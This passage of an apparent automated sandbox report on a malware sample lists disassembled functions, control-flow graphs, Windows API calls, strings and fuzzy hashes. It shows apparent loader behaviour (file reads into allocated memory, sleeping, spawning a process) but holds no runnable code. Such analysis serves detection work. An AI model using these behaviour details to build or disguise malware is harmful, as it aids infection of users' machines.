                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID: p#}$p#}$p#}$p#}$p%}$p%}$x#}$x#}
                          • API String ID: 1385522511-210118448
                          • Opcode ID: d667d102355362c0b29bafc7b183dd1c5d7c111f275afaa00fb581f1875d4f97
                          • Instruction ID: ec605d7e78951ede8b2736d1e6128005d5eb667a293a9917f8ed8b26e22ae3ba
                          • Opcode Fuzzy Hash: d667d102355362c0b29bafc7b183dd1c5d7c111f275afaa00fb581f1875d4f97
                          • Instruction Fuzzy Hash: 7932B074A00209DFDB24DF54C894ABEB7F5EF44310F14815AED05AB2A1D7BCAE86CB91
                          Function 00703170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 769 703170-703185 770 7031e5-7031e7 769->770 771 703187-70318a 769->771 770->771 774 7031e9 770->774 772 7031eb 771->772 773 70318c-703193 771->773 775 7031f1-7031f6 772->775 776 742dfb-742e23 call 7018e2 call 71e499 772->776 777 703265-70326d PostQuitMessage 773->777 778 703199-70319e 773->778 779 7031d0-7031d8 DefWindowProcW 774->779 780 7031f8-7031fb 775->780 781 70321d-703244 SetTimer RegisterWindowMessageW 775->781 815 742e28-742e2f 776->815 786 703219-70321b 777->786 783 7031a4-7031a8 778->783 784 742e7c-742e90 call 76bf30 778->784 785 7031de-7031e4 779->785 787 703201-703214 KillTimer call 7030f2 call 703c50 780->787 788 742d9c-742d9f 780->788 781->786 790 703246-703251 CreatePopupMenu 781->790 791 742e68-742e77 call 76c161 783->791 792 7031ae-7031b3 783->792 784->786 808 742e96 784->808 786->785 787->786 800 742dd7-742df6 MoveWindow 788->800 801 742da1-742da5 788->801 790->786 791->786 797 742e4d-742e54 792->797 798 7031b9-7031be 792->798 797->779 802 742e5a-742e63 call 760ad7 797->802 806 703253-703263 call 70326f 798->806 807 7031c4-7031ca 798->807 800->786 809 742dc6-742dd2 SetFocus 801->809 810 742da7-742daa 801->810 802->779 806->786 807->779 807->815 808->779 809->786 810->807 811 742db0-742dc1 call 7018e2 810->811 811->786 815->779 819 742e35-742e48 call 7030f2 call 703837 815->819 819->779
                          APIs
                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0070316A,?,?), ref: 007031D8
                          • KillTimer.USER32(?,00000001,?,?,?,?,?,0070316A,?,?), ref: 00703204
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00703227
                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0070316A,?,?), ref: 00703232
                          • CreatePopupMenu.USER32 ref: 00703246
                          • PostQuitMessage.USER32(00000000), ref: 00703267
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                          • String ID: TaskbarCreated
                          • API String ID: 129472671-2362178303
                          • Opcode ID: 6c06a6b7cd9a8f5bae8e1f641f102d93984e8418bdcd5aa3aa54d8bd6f7ccee7
                          • Instruction ID: 1d35d74cdbf6058ac79a1f25e85dcbea1277f05b101674796dfea7817679c5f4
                          • Opcode Fuzzy Hash: 6c06a6b7cd9a8f5bae8e1f641f102d93984e8418bdcd5aa3aa54d8bd6f7ccee7
                          • Instruction Fuzzy Hash: 22412635240204FBDF155BB89C2DB793BADFB09340F848327F902862E2C77D9A4297A5
                          Function 0070DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: D%}$D%}$D%}$D%}$D%}D%}$Variable must be of type 'Object'.
                          • API String ID: 0-1073507847
                          • Opcode ID: 613ae8667d468ad0c77c7c65abf84e2fb4b36b7dd345c4f37ed10b2c28af909c
                          • Instruction ID: 673b823800580dc104de188e1d811510c6b7c24781d3604155f892d059a87102
                          • Opcode Fuzzy Hash: 613ae8667d468ad0c77c7c65abf84e2fb4b36b7dd345c4f37ed10b2c28af909c
                          • Instruction Fuzzy Hash: 6BC27F71A00215CFCB14CF58D884AADB7F1BF19310F248A69E955AB3E1D379ED82CB91
                          Function 02530920 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1335 2530920-2530972 call 2530820 CreateFileW 1338 2530974-2530976 1335->1338 1339 253097b-2530988 1335->1339 1340 2530ad4-2530ad8 1338->1340 1342 253099b-25309b2 VirtualAlloc 1339->1342 1343 253098a-2530996 1339->1343 1344 25309b4-25309b6 1342->1344 1345 25309bb-25309e1 CreateFileW 1342->1345 1343->1340 1344->1340 1347 25309e3-2530a00 1345->1347 1348 2530a05-2530a1f ReadFile 1345->1348 1347->1340 1349 2530a43-2530a47 1348->1349 1350 2530a21-2530a3e 1348->1350 1351 2530a49-2530a66 1349->1351 1352 2530a68-2530a7f WriteFile 1349->1352 1350->1340 1351->1340 1355 2530a81-2530aa8 1352->1355 1356 2530aaa-2530acf FindCloseChangeNotification VirtualFree 1352->1356 1355->1340 1356->1340
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02530965
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                          • Instruction ID: 47abc5cb5b34f5b40f23bc9579791b297fb3acbc55acf6b257801c67a89890ec
                          • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                          • Instruction Fuzzy Hash: 1C51E776A50208BBEB20DFA4CC59FDEBB78BF48700F108954F60AEA1C0DA749645CB64
                          Function 00702C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1375 702c63-702cd3 CreateWindowExW * 2 ShowWindow * 2
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00702C91
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00702CB2
                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00701CAD,?), ref: 00702CC6
                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00701CAD,?), ref: 00702CCF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: 17e4b9bbfd81e8528de5a3e1be5182604151025e81f489b436097f5500504e2d
                          • Instruction ID: 2589e3d7d6f0aa35f43ced9b8d33811eef524faaac327a9c776e8b769a732f72
                          • Opcode Fuzzy Hash: 17e4b9bbfd81e8528de5a3e1be5182604151025e81f489b436097f5500504e2d
                          • Instruction Fuzzy Hash: CDF0DA756412907BEB311717BC08E772FBDD7C6F60B80805BF904A25A0C6691851DAB8
                          Function 00772947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1490 772947-7729b9 call 741f50 call 7725d6 call 71fe0b call 705722 call 77274e call 70511f call 725232 1505 7729bf-7729c6 call 772e66 1490->1505 1506 772a6c-772a73 call 772e66 1490->1506 1511 772a75-772a77 1505->1511 1512 7729cc-772a6a call 72d583 call 724983 call 729038 call 72d583 call 729038 * 2 1505->1512 1506->1511 1513 772a7c 1506->1513 1514 772cb6-772cb7 1511->1514 1516 772a7f-772b3a call 7050f5 * 8 call 773017 call 72e5eb 1512->1516 1513->1516 1517 772cd5-772cdb 1514->1517 1555 772b43-772b5e call 772792 1516->1555 1556 772b3c-772b3e 1516->1556 1520 772cf0-772cf6 1517->1520 1521 772cdd-772ced call 71fdcd call 71fe14 1517->1521 1521->1520 1559 772b64-772b6c 1555->1559 1560 772bf0-772bfc call 72e678 1555->1560 1556->1514 1562 772b74 1559->1562 1563 772b6e-772b72 1559->1563 1567 772c12-772c16 1560->1567 1568 772bfe-772c0d DeleteFileW 1560->1568 1564 772b79-772b97 call 7050f5 1562->1564 1563->1564 1572 772bc1-772bd7 call 77211d call 72dbb3 1564->1572 1573 772b99-772b9e 1564->1573 1570 772c91-772ca5 CopyFileW 1567->1570 1571 772c18-772c7e call 7725d6 call 72d2eb * 2 call 7722ce 1567->1571 1568->1514 1575 772ca7-772cb4 DeleteFileW 1570->1575 1576 772cb9-772ccf DeleteFileW call 772fd8 1570->1576 1571->1576 1595 772c80-772c8f DeleteFileW 1571->1595 1590 772bdc-772be7 1572->1590 1578 772ba1-772bb4 call 7728d2 1573->1578 1575->1514 1581 772cd4 1576->1581 1588 772bb6-772bbf 1578->1588 1581->1517 1588->1572 1590->1559 1592 772bed 1590->1592 1592->1560 1595->1514
                          APIs
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00772C05
                          • DeleteFileW.KERNEL32(?), ref: 00772C87
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00772C9D
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00772CAE
                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00772CC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: File$Delete$Copy
                          • String ID:
                          • API String ID: 3226157194-0
                          • Opcode ID: b5236c35a063276e326883eb05560788c63ccb8e3eea2ad7b4cfdebc50654e7e
                          • Instruction ID: f1d306269b4d32e498a3bf23df74bf377dad9d639fd6aa249857b291b213e278
                          • Opcode Fuzzy Hash: b5236c35a063276e326883eb05560788c63ccb8e3eea2ad7b4cfdebc50654e7e
                          • Instruction Fuzzy Hash: D3B171B1D00129EBDF21DFA4CC89EDE77BDEF49340F1080A6F519E6152EA389A458F61
                          Function 00735AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1870 735aa9-735ace 1871 735ad0-735ad2 1870->1871 1872 735ad7-735ad9 1870->1872 1873 735ca5-735cb4 call 720a8c 1871->1873 1874 735adb-735af5 call 72f2c6 call 72f2d9 call 7327ec 1872->1874 1875 735afa-735b1f 1872->1875 1874->1873 1876 735b21-735b24 1875->1876 1877 735b26-735b2c 1875->1877 1876->1877 1880 735b4e-735b53 1876->1880 1881 735b4b 1877->1881 1882 735b2e-735b46 call 72f2c6 call 72f2d9 call 7327ec 1877->1882 1886 735b55-735b61 call 739424 1880->1886 1887 735b64-735b6d call 73564e 1880->1887 1881->1880 1921 735c9c-735c9f 1882->1921 1886->1887 1898 735ba8-735bba 1887->1898 1899 735b6f-735b71 1887->1899 1904 735c02-735c23 WriteFile 1898->1904 1905 735bbc-735bc2 1898->1905 1901 735b73-735b78 1899->1901 1902 735b95-735b9e call 73542e 1899->1902 1906 735b7e-735b8b call 7355e1 1901->1906 1907 735c6c-735c7e 1901->1907 1920 735ba3-735ba6 1902->1920 1910 735c25-735c2b GetLastError 1904->1910 1911 735c2e 1904->1911 1912 735bf2-735c00 call 7356c4 1905->1912 1913 735bc4-735bc7 1905->1913 1930 735b8e-735b90 1906->1930 1918 735c80-735c83 1907->1918 1919 735c89-735c99 call 72f2d9 call 72f2c6 1907->1919 1910->1911 1922 735c31-735c3c 1911->1922 1912->1920 1914 735be2-735bf0 call 735891 1913->1914 1915 735bc9-735bcc 1913->1915 1914->1920 1915->1907 1923 735bd2-735be0 call 7357a3 1915->1923 1918->1919 1928 735c85-735c87 1918->1928 1919->1921 1920->1930 1924 735ca4 1921->1924 1931 735ca1 1922->1931 1932 735c3e-735c43 1922->1932 1923->1920 1924->1873 1928->1924 1930->1922 1931->1924 1936 735c45-735c4a 1932->1936 1937 735c69 1932->1937 1938 735c60-735c67 call 72f2a3 1936->1938 1939 735c4c-735c5e call 72f2d9 call 72f2c6 1936->1939 1937->1907 1938->1921 1939->1921
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: JOp
                          • API String ID: 0-2779313138
                          • Opcode ID: c01034da7e18a900597d4c6c4ccc36e41318a562e9370f5e4ba2939686ae1ec3
                          • Instruction ID: b85bfcaefd4026abe9a8cb730bafb1d34bf68964b3aae29133eb9515e03da63f
                          • Opcode Fuzzy Hash: c01034da7e18a900597d4c6c4ccc36e41318a562e9370f5e4ba2939686ae1ec3
                          • Instruction Fuzzy Hash: A951AFB1D0061AEFEB219FA4D849FEEBBB8AF06314F14015AF405A7293D73D99018B71
                          Function 025323C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1949 25323c0-25324cc call 2530000 call 25322b0 CreateFileW 1956 25324d3-25324e3 1949->1956 1957 25324ce 1949->1957 1960 25324e5 1956->1960 1961 25324ea-2532504 VirtualAlloc 1956->1961 1958 253259e-25325a3 1957->1958 1960->1958 1962 2532506 1961->1962 1963 253250b-2532522 ReadFile 1961->1963 1962->1958 1964 2532526-253253b call 2531070 1963->1964 1965 2532524 1963->1965 1967 2532540-2532578 call 25322f0 call 2532060 1964->1967 1965->1958 1972 2532594-253259c 1967->1972 1973 253257a-253258f call 2532340 1967->1973 1972->1958 1973->1972
                          APIs
                            • Part of subcall function 025322B0: Sleep.KERNELBASE(000001F4), ref: 025322C1
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 025324C2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateFileSleep
                          • String ID: J7D986WGK7DX18P
                          • API String ID: 2694422964-658706119
                          • Opcode ID: f9718f6fe3f72f1caea4fe6591e19adeb490ce1f6d828344cdd4e578a749bd4f
                          • Instruction ID: ac200f742e383d05162f5f5d13c9f3ad9498601c13426d912d49f158e98b0311
                          • Opcode Fuzzy Hash: f9718f6fe3f72f1caea4fe6591e19adeb490ce1f6d828344cdd4e578a749bd4f
                          • Instruction Fuzzy Hash: A4517F71D04249DBEF11DBA4C914BEFBBB9AF48300F004199EA08BB2C0D7794B49CBA5
                          Function 00703B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00703B0F,SwapMouseButtons,00000004,?), ref: 00703B40
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00703B0F,SwapMouseButtons,00000004,?), ref: 00703B61
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00703B0F,SwapMouseButtons,00000004,?), ref: 00703B83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: 396002a4fed041b7c13ee410e0ee2aa888302486b4f074937d0b309cf5cdc5c2
                          • Instruction ID: bd9dff7c2bcf0b86668e3cb6827feba11fdabb2f0dbce50b971c60cc354ce93b
                          • Opcode Fuzzy Hash: 396002a4fed041b7c13ee410e0ee2aa888302486b4f074937d0b309cf5cdc5c2
                          • Instruction Fuzzy Hash: 58112AB5510208FFDB21CFA9DC85AAEBBFCEF04748B10855AA805D7150E2359E459764
                          Function 00703923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007433A2
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00703A04
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_wcslen
                          • String ID: Line:
                          • API String ID: 2289894680-1585850449
                          • Opcode ID: 47da5bc3211248bd29cc281826136151386fa7a967c73cda3fda07d6430c43bd
                          • Instruction ID: ed3a7753648e31e1b5f3614aa6c91926f8366e2cc8fa40504e1b6c4778d65c39
                          • Opcode Fuzzy Hash: 47da5bc3211248bd29cc281826136151386fa7a967c73cda3fda07d6430c43bd
                          • Instruction Fuzzy Hash: 9431C171509300EAC725EB24DC49BEBB7ECAF40714F408A2BF599821D1DB7CAA49C7C6
                          Function 00702DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          • GetOpenFileNameW.COMDLG32(?), ref: 00742C8C
                            • Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2
                            • Part of subcall function 00702DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00702DC4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Name$Path$FileFullLongOpen
                          • String ID: X$`e|
                          • API String ID: 779396738-3909034667
                          • Opcode ID: 91408d900c14829e0daef670ad2838eb70f269fb46016cbc99c8ecd389daf1fc
                          • Instruction ID: a2a653a9cf0595833e47651f70e4157de6a4ae73a25846c02ac9c7941e11d5c5
                          • Opcode Fuzzy Hash: 91408d900c14829e0daef670ad2838eb70f269fb46016cbc99c8ecd389daf1fc
                          • Instruction Fuzzy Hash: 08219671A00298DBCB41EF94D849BDE7BFC9F49304F50805AE505A7282DBBC5A898B61
                          Function 0071FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00720668
                            • Part of subcall function 007232A4: RaiseException.KERNEL32(?,?,?,0072068A,?,007D1444,?,?,?,?,?,?,0072068A,00701129,007C8738,00701129), ref: 00723304
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00720685
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Exception@8Throw$ExceptionRaise
                          • String ID: Unknown exception
                          • API String ID: 3476068407-410509341
                          • Opcode ID: 8ee4a27df8bbe23c17aef43a97db52037abdb2ccd04f2bccdbac688e1ff2c131
                          • Instruction ID: 96ffdfa2b878e6e573aa0089c4756aa6fd2a9f1126799ef28ea6a493e4fae8d8
                          • Opcode Fuzzy Hash: 8ee4a27df8bbe23c17aef43a97db52037abdb2ccd04f2bccdbac688e1ff2c131
                          • Instruction Fuzzy Hash: 89F0AF24A0021DE7CB04B6A8F85ADAE7B6C6E00310B604535F824965D3EF7DDB6586E1
                          Function 02531000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 02531045
                          • ExitProcess.KERNEL32(00000000), ref: 02531064
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$CreateExit
                          • String ID: D
                          • API String ID: 126409537-2746444292
                          • Opcode ID: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                          • Instruction ID: cabb0a12a48dd053fdc07ac4903703e77f54f9545eb92383b0a71b522864cf3c
                          • Opcode Fuzzy Hash: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                          • Instruction Fuzzy Hash: E6F0EC7254424CABDB60DFE0CC49FEE777CBF44701F008508FB0ADA180DA789A088B65
                          Function 00773017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0077302F
                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00773044
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Temp$FileNamePath
                          • String ID: aut
                          • API String ID: 3285503233-3010740371
                          • Opcode ID: 58555908a0eae7fdf910019e0645952c19ca2b55ee7f7378bf639a68c87b118c
                          • Instruction ID: f35556ee28e8781fd0cd024ca35b8a25a8bbc306aecfa5dc621937fabfec24cf
                          • Opcode Fuzzy Hash: 58555908a0eae7fdf910019e0645952c19ca2b55ee7f7378bf639a68c87b118c
                          • Instruction Fuzzy Hash: E5D05EB250032877DE20A7A4AC4EFCB3B6CEB04750F0042A2B655E6091DAB89985CBE4
                          Function 00787F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007882F5
                          • TerminateProcess.KERNEL32(00000000), ref: 007882FC
